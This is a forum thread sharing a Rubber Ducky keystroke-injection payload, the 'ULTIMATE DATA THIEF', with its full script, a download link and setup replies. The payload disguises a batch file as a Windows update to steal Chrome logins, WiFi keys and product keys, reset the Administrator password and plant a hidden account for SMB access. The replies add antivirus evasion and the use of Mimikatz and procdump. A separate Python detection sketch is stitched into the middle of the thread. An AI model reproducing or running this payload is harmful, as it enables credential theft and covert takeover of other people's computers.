
Ok, so there's a lot of cool Ducky scripts out there, my personal favourite is the script that steals Windows passwords - AWESOME!!! But do any scripts aim to get more than just a Windows password? Do any of them "Backup" Google Chrome Login Data, WiFi keys, Windows Product Keys or Replace the Administrator password or even hide the account so you can have "stealthy" remote access via Windows Shares (Known as SMB)? I THINK PAYLOADS SHOULD DO MORE!

So...

I introduce the ULTIMATE DATA THIEF!!!

Payload:

DELAY 15000
REM Author: Lavanoid Volcanic
REM This script supports Windows XP as well as Vista and 7.
REM I don't have Windows 8 (I really want it though) so I cant test it.
REM This Script looks for the drive named "JUNK" because "DUCKY" is too exposing.
GUI d
DELAY 500
GUI r
DELAY 1500
STRING notepad.exe
DELAY 200
ENTER
DELAY 1500
STRING @echo off
DELAY 200
ENTER
DELAY 200
STRING Ti
DELAY 200
STRING tle = Installing Windows Update...
DELAY 200
ENTER
STRING @echo Installing Windows Update...
DELAY 200
ENTER
STRING set duck=
DELAY 200
ENTER
STRING COLOR F0
DELAY 200
ENTER
STRING :start
DELAY 200
ENTER
STRING if not "%LOCALAPPDATA%"=="" goto win_new
DELAY 200
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "JUNK"') do set duck=%%A
DELAY 200
ENTER
STRING if "%duck%"=="" goto start
DELAY 200
ENTER
STRING set duck=%duck%:
DELAY 200
ENTER
STRING %duck%
DELAY 200
ENTER
STRING CD "Data"
DELAY 200
ENTER
STRING "SCRIPT_EX.exe" "SP.bat"
DELAY 200
ENTER
STRING EXIT
DELAY 200
ENTER
STRING :win_new
DELAY 400
ENTER
DELAY 400
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "JUNK"') do set duck=%%d
DELAY 200
ENTER
STRING if "%duck%"=="" goto start
DELAY 200
ENTER
STRING %duck%
DELAY 200
ENTER
STRING CD "Data"
DELAY 200
ENTER
STRING "SCRIPT_EX.exe" "SP.bat"
DELAY 200
ENTER
STRING EXIT
DELAY 200
ENTER
CTRL S
DELAY 1500
STRING %TEMP%\DS.bat
DELAY 1000
ENTER
DELAY 600
ALT Y
DELAY 700
ALT F4
GUI r
DELAY 1500
STRING %TEMP%\DS.bat
ENTER
DELAY 1000
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
GUI r
DELAY 1200
STRING explorer.exe
ENTER
DELAY 1500
ALT F4

Unfortunately, the forum only allows a maximum of 500kb of upload space and the extra data is just over 1MB so I put the file on my Dropbox account instead.

Link: https://www.dropbox.com/sh/ad8jegywipd3l76/jo2KqlU3CB

READ ME!!.txt contents:

SCRIPT/PAYLOAD BY LAVANOID VOLCANIC

THE DIRECTORIES ABOVE OR BELOW (DEPENDING ON YOUR CONFIGURATION) SHOULD
BE COPIED TO THE ROOT DIRECTORY OF THE DUCKY DRIVE. YOU SHOULD EDIT
THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS.

FILE LOCATIONS:

SP.bat -- Data\SP.bat
inject.txt -- Scripts\Projects\Steal_Data\inject.txt
Compiler.bat -- Scripts\Compiler.bat

COMPILER.bat description:

The compiler batch file basically takes away the hassle of entering
all those annoying time draining commands. If the Compiler.bat file
is stored on the Duck, the compiler will ask if you want to install it
on the Duck.

WHAT I HOPE:

I hope that my project will be featured in one of the Hak5 videos
since I do like some attention. THIS WORLD IS LONELY YOU KNOW!!

Thank you for choosing to spend a bit of your time by
poking your nose into my work.
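A defender-side detection sketch for the trail this payload leaves on the host (a text editor writing a .bat into %TEMP%, that file being launched, then diskpart or "wmic volume" enumeration spawned from it), added here as an example and not part of the original post or Lavanoid's files. The event field names and the sample records are constructed for the example, loosely modelled on Sysmon file-create (ID 11) and process-create (ID 1) events.

```python
import re

# Constructed sample events (assumed, simplified schema): a benign edit
# followed by the sequence the DS.bat payload above produces.
SAMPLE_EVENTS = [
    {"id": 11, "image": r"C:\Windows\notepad.exe",
     "target": r"C:\Users\alice\Documents\notes.txt"},
    {"id": 11, "image": r"C:\Windows\notepad.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\DS.bat"},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\DS.bat"'},
    {"id": 1, "image": r"C:\Windows\System32\diskpart.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "diskpart"},
    {"id": 1, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic volume get driveletter, label"},
]

# A .bat path under the per-user Temp directory (matches inside quotes too).
TEMP_BAT = re.compile(r"\\AppData\\Local\\Temp\\[^\\\"\s]+\.bat\b", re.IGNORECASE)
# Volume/drive-letter enumeration, as the payload does to find its "JUNK" drive.
VOLUME_ENUM = re.compile(r"(diskpart|wmic\s+volume)", re.IGNORECASE)

STAGES = ["editor_wrote_temp_bat", "temp_bat_executed", "volume_enumeration"]


def find_indicators(events):
    """Return (stage, evidence) tuples for each suspicious event, in log order."""
    hits = []
    for ev in events:
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        cmdline = ev.get("cmdline", "")
        if ev["id"] == 11 and image.endswith("notepad.exe") and TEMP_BAT.search(ev["target"]):
            hits.append((STAGES[0], ev["target"]))
        elif ev["id"] == 1 and image.endswith("cmd.exe") and TEMP_BAT.search(cmdline):
            hits.append((STAGES[1], cmdline))
        elif ev["id"] == 1 and parent.endswith("cmd.exe") and VOLUME_ENUM.search(cmdline):
            hits.append((STAGES[2], cmdline))
    return hits


def is_ducky_like_chain(events):
    """True only when all three stages appear in order; any one alone is noisy."""
    pos = 0
    for stage, _ in find_indicators(events):
        if pos < len(STAGES) and stage == STAGES[pos]:
            pos += 1
    return pos == len(STAGES)
```

Requiring the three stages in sequence keeps a lone diskpart run or a developer saving a batch file from triggering on its own.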


I love passive-aggressiveness!

Back on topic, well done Lavanoid! You probably put a bunch of effort into this, and I will give it a test in the near future. Good work doesn't need huge PR though, just look at the Rubber Ducky and WiFi Pineapple. Your work will get attention if it's good at what it does, just keep putting the hard work in!

Good job.


Just updated the "Backup_Eraser.bat", "SP.bat" and "Data.zip" files. Just download and extract the "Data.zip".

Changes:

Backup_Eraser.bat - Forgot to replace the directory variable with "Backups", it was set as "Pass" so it wouldn't locate any backups.

SP.bat - Minor bug fixes and spelling corrections. I misspelt "process_dump" by adding an extra character. Previous value: proccess_dump. Whoops.

Edited by Lavanoid

Hello,

Can you explain a little bit more how all the included files work together?!

What to do to get it work?

  • Do I have to run compiler.bat manually? Do I have to run it to configure the payload (inject.bin)?
  • When I want to run the payload, do I need to plug in an extra USB drive named "JUNK" to get the info copied to this drive?
  • "YOU SHOULD EDIT THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS." <- What exactly do I need to edit?

Thanks. A little step by step tutorial would help.

HzM74


Basically, you run the compiler.bat to compile the inject.txt file into an inject.dat file. The file will be saved in the same directory as the .txt. Just place your ducky scripts in 'Data\Projects\<name of project>' and the file MUST be named 'inject.txt'.

The compiler will install on any USB drive as long as it is stored on a USB drive; the name doesn't matter. I used some special variables so the compiler knows what drive it is stored on.

The sp.bat file has a few "triggers" inside of it. Just open it with a notepad editor (I use notepad++) and change the configuration part of it. There is a variable called "avoid_antivirus" and by default that is set as true, so you can set it as false if you wish. When it's set as true, some commands won't execute, such as Chromepass, Mimikatz, etc. However, you can enable the proc_dump program (by changing the other variables) to avoid antivirus but still get a user's password.

inject.txt was designed to find the drive 'JUNK', so you can edit it so it will find a different label instead. It doesn't have to be named 'JUNK'.

If you open some of the other files in a text editor, you should be able to figure out what they do.

Just extract data.zip and place all the files on the duck. SP.bat is executed by 'SCRIPT_EX.exe', which has an Administrator manifest, so you don't need PowerShell. SCRIPT_EX.exe is launched by the inject.dat file (payload).

The compiler is just a tool designed to make your duck experience easier.


You also need the Twin Duck firmware (forgot to mention). If you don't want to use Twin Duck, then just put the 'Data' directory on another drive called "JUNK" or whatever you set the drive label as.

The compiler should be stored on the duck if you want to install a payload directly on the duck.
